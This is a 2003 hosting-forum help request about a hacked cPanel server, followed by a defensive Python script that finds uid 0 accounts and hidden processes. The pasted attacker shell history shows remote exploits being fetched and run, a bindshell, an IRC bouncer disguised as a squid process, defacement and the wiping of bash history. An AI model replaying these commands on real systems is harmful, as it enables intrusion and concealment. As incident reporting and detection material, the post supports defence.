Old 12-11-2003, 11:45 AM
brumie
Registered User
Join Date: Dec 2003
Posts: 40
new server got hacked

Just got hacked.
Moved to a new server and after a few hours it got hacked.

All index.* files have been replaced,
including all cPanel themes and all clients.

So when you log on to http://server/cpanel or
http://server/webmail,
all you see is the hacker page:
http://vipixel.com/hacked.jpg

I can delete the user techteam, whose uid is 0,
but how do I remove the hidden Trojan?
It says it has a hidden pid:

uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]

Here's the log I can grab:
Code:
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget www.viperhaxu.hpg.com.br/ptrace
chmod ptrace
chmod 777 ptrace
./ptrace
wget www.skater0x.hpg.com.br/local/kmod
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget www.skater0x.hpg.com.br/xpll/cancer
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget www.creatividade.hpg.com.br/locals
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget www.geocities.com/sorin_smen/psybnc.tgz
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd www.geocities.com/sorin_smen/psybnc.tgz
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget www.geocities.com/sorin_smen/psybnc.tgz
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit
I ran this:
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but it seems to be a false alarm...

How do I cleanly remove the trojan file?
Please, please help.
FYI the server is updated to the latest kernel, 2.4.23,
but we're still worried about this mass defacement attack.

Mind sharing security tips and tricks for WHM/cPanel settings?

Thanks in advance,
Brumie
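The scanner output quoted in the post rests on two simple checks: an account other than root with uid 0 in /etc/passwd, and a process id that exists but is missing from what `ps` shows (or, for a kernel-level rootkit, missing from /proc as well). The script below is an added example of those checks, not the poster's or chkrootkit's code. The passwd lines, /proc listing and `ps -e` output it runs on are constructed samples (the pid 10 and the "squid -D" process name are taken from the post); `live_scan()` is the only part that touches the running host, and its pid-probing via `os.kill(pid, 0)` assumes a Linux box where the probe is run as root.

```python
"""
Offline versions of two rootkit-scanner checks: a non-root uid 0 account,
and a pid that exists but is hidden from ps or from /proc.
Added example; sample inputs below are constructed.
"""
import os
import re


def uid0_accounts(passwd_text):
    """Login names with uid 0 other than root, from /etc/passwd contents."""
    found = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:  # malformed line, not a passwd entry
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            found.append(name)
    return found


def pids_from_proc(proc_entries):
    """Numeric entries of a /proc listing (as returned by os.listdir('/proc'))."""
    return {int(e) for e in proc_entries if e.isdigit()}


def pids_from_ps(ps_output):
    """PIDs from `ps -e` output; the first line is the column header."""
    pids = set()
    for line in ps_output.splitlines()[1:]:
        m = re.match(r"\s*(\d+)\s", line)
        if m:
            pids.add(int(m.group(1)))
    return pids


def hidden_from_ps(proc_entries, ps_output):
    """PIDs listed in /proc but absent from ps: a trojaned ps or libproc."""
    return sorted(pids_from_proc(proc_entries) - pids_from_ps(ps_output))


def hidden_from_proc(alive_pids, proc_entries):
    """PIDs the kernel answers for but /proc does not list: kernel-level hiding."""
    return sorted(set(alive_pids) - pids_from_proc(proc_entries))


def pid_exists(pid):
    """Signal-0 probe: True if the kernel knows the pid, even if /proc hides it."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # exists but belongs to another user
    return True


def live_scan(max_pid=32768):
    """Run both process checks on this host. Processes that exit between the
    /proc listing and the probe loop show up as false positives; rerun to confirm."""
    proc = os.listdir("/proc")
    ps_out = os.popen("ps -e").read()
    alive = [p for p in range(1, max_pid + 1) if pid_exists(p)]
    return {
        "hidden_from_ps": hidden_from_ps(proc, ps_out),
        "hidden_from_proc": hidden_from_proc(alive, proc),
    }


# Constructed sample data: a techteam uid 0 account, pid 10 missing from ps.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
techteam:x:0:0::/home/techteam:/bin/bash
brumie:x:500:500::/home/brumie:/bin/bash
"""
SAMPLE_PROC = ["1", "2", "10", "512", "self", "cpuinfo", "32751"]
SAMPLE_PS = """  PID TTY          TIME CMD
    1 ?        00:00:04 init
    2 ?        00:00:00 keventd
  512 ?        00:00:00 sshd
32751 ?        00:00:00 squid -D
"""

if __name__ == "__main__":
    print("uid 0 accounts:", uid0_accounts(SAMPLE_PASSWD))       # ['techteam']
    print("hidden from ps:", hidden_from_ps(SAMPLE_PROC, SAMPLE_PS))  # [10]
    print("live:", live_scan())
```

The uid 0 check is the one to run first on a hacked box, because removing the techteam account closes the attacker's simplest way back in. The process checks only tell you a pid is being hidden, not by what; once a kernel module rootkit is confirmed (the post's "hidden from kernel: yes"), nothing read from that kernel can be trusted, which is why the usual advice is to rebuild from clean media rather than hunt for the trojan file in place.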